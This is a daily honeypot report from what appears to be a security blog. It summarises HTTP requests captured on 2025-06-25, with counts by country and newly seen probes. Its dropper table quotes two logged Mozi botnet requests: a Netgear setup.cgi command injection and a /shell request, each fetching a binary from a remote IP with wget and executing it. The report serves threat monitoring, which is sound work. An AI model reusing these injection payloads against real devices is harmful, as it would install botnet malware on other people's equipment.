Skip to main content
  1. Daily-Posts/

Report: 2025-06-25

·318 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-25
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 10 new requests that have never been observed before (these were added to the monitored request database.).

A total of 3295 requests were recorded during the day, originating from 2 different countries, with a peak of 2685 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
222.138.100.15GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://222.138.100.15:54497/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
117.211.157.209GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.211.157.209:52255/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
87GET /client/login HTTP/1.1
442GET /auth/login HTTP/1.1
9321\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xA9r\xF7\x7F\x00\x00\x10\xF8\xEA\x93\xD7\x00\x00\x00\xE0\x81\xCEr\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
9481\x00\x0E8\xE1\xB1\xE8\xA5\xD5\xE7H3\x00\x00\x00\x00\x00
9521GET /favicons/manifest.json HTTP/1.1
9571HELF<\x00\x00\x00
9581\x00\x0E\x08\xE1\xB1\xE8\xA5\xD5\xE7H3\x00\x00\x00\x00\x00
10591GET /odinhttpcall1750879510 HTTP/1.1
10611GET /OdinHttpCall1750879510 HTTP/1.1
10621GET /Odin/http/call1750879510 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
02685GB
1219US
252HK
347BG
445DE
540NL
623JP
720SG
815RU
915FR
1015AU
1111RO
1211SE
139UA
148IN
157SC
167PT
176ES
186PL
196CH
206HU
215KR
225BE
234BR
244CN
253KZ
263GH
272AZ
282LT
292MC
302IE
312PA
322AO
332IT
341GR
351TR
361CA
371IR

Related

Report: 2025-06-24
·327 words
Repport Daily
Report: 2025-06-23
·838 words
Repport Daily
Report: 2025-06-22
·398 words
Repport Daily